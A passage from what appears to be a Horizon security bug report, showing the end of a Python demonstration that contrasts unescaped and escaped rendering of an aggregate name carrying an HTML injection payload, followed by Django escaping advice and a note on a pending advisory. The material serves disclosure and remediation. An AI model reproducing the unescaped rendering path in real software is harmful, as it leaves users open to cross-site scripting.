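    value containing HTML metacharacters appears verbatim in the output,
    i.e. it was not escaped on the way into the page."""
    has_metachars = any(ch in value for ch in '<>"&')
    return has_metachars and value in markup


if __name__ == '__main__':
    # Stand-alone demonstration: the unescaped row carries the payload raw,
    # the escaped row does not.
    print(render_row_unescaped(AGGREGATE_NAME, AVAILABILITY_ZONE))
    print(render_row_escaped(AGGREGATE_NAME, AVAILABILITY_ZONE))
    print(render_message_escaped(AGGREGATE_NAME))
```

In Django code the idiomatic equivalent is to let the template engine autoescape the variables, or to build strings with django.utils.html.format_html so that interpolated values are escaped while the literal markup is not; the check at the end is the kind of assertion a view test can run over the rendered aggregate row and message to catch a regression.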
I've added an incomplete security advisory task, pending additional feedback/confirmation from Horizon core security reviewers.